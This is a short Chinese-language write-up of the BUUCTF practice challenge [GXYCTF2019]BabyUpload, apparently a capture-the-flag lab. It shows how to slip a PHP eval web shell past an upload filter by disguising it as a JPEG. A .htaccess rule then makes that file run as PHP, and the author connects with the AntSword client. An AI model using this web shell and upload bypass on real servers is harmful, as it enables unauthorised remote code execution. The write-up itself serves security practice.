BUUCTF在线评测-练习场-WebCTF习题[GXYCTF2019]BabyUpload1-flag获取、解析
解题思路
打开靶场,看到文件上传位置
结合题目,是一道文件上传题。
题目考察的跟之前有一道基本一样,图片内容并没有检查,检查了后缀名、文件类型以及文件是否有php内容,过滤还是比较丰富的。
这里双写绕过、后缀绕过基本不行。首先我们要绕过php内容检测,用基本的script绕过就可以
<script language="php">@eval($_POST['123']);</script>
我认为比较坑的来了,这里要用jpg,不能用png,感觉题目是把p这个字符给过滤了...
我上传真的图片.png,都给我拦截了...
Content-Disposition: form-data; name="uploaded"; filename="1.jpg"
Content-Type: image/jpeg
然后就是老演员,解析文件.htaccess,可以让我们的jpg文件解析成php文件
ontent-Disposition: form-data; name="uploaded"; filename=".htaccess"
Content-Type: image/jpeg<FilesMatch "1.jpg">
SetHandler application/x-httpd-php
</FilesMatch>
然后用蚁剑连接即可,这里注意路径,从upload开始哈
最终在根目录下找到flag
总结
一道基础的文件上传解析漏洞,那个png上传不了,给我弄迷糊了...连接上去看了下源码
还真不给上传Png..